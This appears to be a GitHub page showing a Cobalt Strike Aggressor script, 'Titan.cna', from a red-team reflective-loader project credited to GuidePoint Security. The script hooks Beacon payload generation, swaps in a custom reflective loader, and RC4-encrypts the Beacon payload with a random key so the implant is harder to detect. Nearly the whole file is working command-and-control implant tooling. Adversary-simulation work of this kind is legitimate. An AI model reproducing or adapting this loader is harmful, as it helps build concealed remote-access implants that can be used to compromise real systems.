forked from realoriginal/titanldr-ng
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathTitan.cna
101 lines (88 loc) · 2.17 KB
/
Titan.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
##
## Reflective Loader
##
## GuidePoint Security LLC
##
## Threat and Attack Simulation
##
import javax.crypto.spec.*;
import java.security.*;
import javax.crypto.*;
##
## Generates a random string ( @offsecginger )
##
sub random_string {
$limit = $1;
@random_str = @();
$characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
for ($x = 0; $x < $limit; $x++) {
$n = rand(strlen($characters));
add(@random_str, charAt($characters, $n));
}
return join('', @random_str);
}
##
## Inserts titan into Beacon
##
set BEACON_RDLL_GENERATE {
##
## Open up titan.
##
$hnd = openf( script_resource( "Titan.". $3 .".bin" ) );
$ldr = readb( $hnd, -1 );
closef( $hnd );
if ( strlen( $ldr ) == 0 ) {
##
## Titan was not compiled.
##
warn( 'titan has not been compiled, using standard cobalt loader.' );
return $null;
};
$prf = data_query( "metadata" )["c2profile"];
if ( [ $prf getString: ".stage.sleep_mask" ] eq "true" ) {
if ( [ $prf getString: ".stage.obfuscate" ] eq "false" ) {
##
## We cannot use sleep_mask with Titan if obfuscate = False
##
warn( 'titan cannot be used with sleep_mask if obfuscate is set to false' );
return $null;
};
};
##
## Ask questions about whether we need workstation
## or other tweaks inserted into the payload on the
## fly.
##
println( ' ___________________ _ __' );
println( '/_ __/ _/_ __/ _ | / |/ /' );
println( ' / / _/ / / / / __ |/ / ' );
println( '/_/ /___/ /_/ /_/ |_/_/|_/ ' );
println( '============================' );
println( 'Reflective Loader by Austin ' );
println( 'GuidePoint Security LLC' );
println( '============================' );
##
## Encrypt the incoming buffer with RC4. Then
## we build a structure information titan of
## the key.
##
$str = random_string( "16" );
$cip = [ Cipher getInstance: "RC4" ];
$key = [ new SecretKeySpec: $str, "RC4" ];
[ $cip init: [ Cipher DECRYPT_MODE ], $key ];
$buf = [ $cip doFinal: $2 ];
$inf = pack( 'I+', strlen( $buf ) );
$inf .= $str . $buf;
println( "ARC4: ". $str );
println( "SIZE: ". strlen( $ldr . $inf ) );
##
## Return Information
##
return $ldr . $inf;
};
##
## Size
##
set BEACON_RDLL_SIZE {
return "0";
};